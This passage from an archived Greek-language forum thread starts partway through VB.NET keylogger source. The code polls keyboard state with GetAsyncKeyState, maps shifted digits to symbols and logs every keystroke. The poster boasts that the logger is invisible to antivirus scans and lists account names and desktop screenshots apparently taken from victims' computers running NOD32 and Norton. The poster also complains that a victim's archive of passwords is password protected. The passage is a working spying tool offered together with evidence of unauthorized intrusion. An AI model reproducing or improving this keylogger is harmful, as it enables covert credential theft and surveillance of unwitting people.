           Pressed = GetAsyncKeyState(i)
           If Pressed = -32767 Then
               If getShift() = True Then
                   Select Case Val(Chr(i))
                       Case 1
                           Key = "!"
                       Case 2
                           Key = "@"
                       Case 3
                           Key = "#"
                       Case 4
                           Key = "$"
                       Case 5
                           Key = "%"
                       Case 6
                           Key = "^"
                       Case 7
                           Key = "&"
                       Case 8
                           Key = "*"
                       Case 9
                           Key = "("
                       Case 0
                           Key = ")"
                   End Select
               Else
                   Key = Chr(i)
               End If
               GoTo KeyFound
           End If
       Next i
       Exit Sub
KeyFound:
       If Key <> "" Then
           Form1.TextBox1.AppendText(Key)
       End If
   End Sub
End Class

Ορίστε η απόδειξη κάντο compile + Run στο Visual Studio 2008 κανένα antivirus δεν το αναγνωρίζει (virustotal scan)

Πως νομίζεις οτι πήρα αυτα τα πανέμορφα Desktops:

OEMPC\Administrator

screenshot7gd8.jpg

Έχει ανοιχτο το NOD 32...

GSRV-A20522BD92\Administrator

screenshot4vf2.jpg

LAPTOP\Αντώνης

screenshot5ny9.jpg

Έχει ανοιχτο το Norton Internet Security... (Κρίμας το kodikoi.rar είναι password protected)

shirtbp2.jpg

Αρχειοθετημένο

Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.

• Δημιουργία νέου...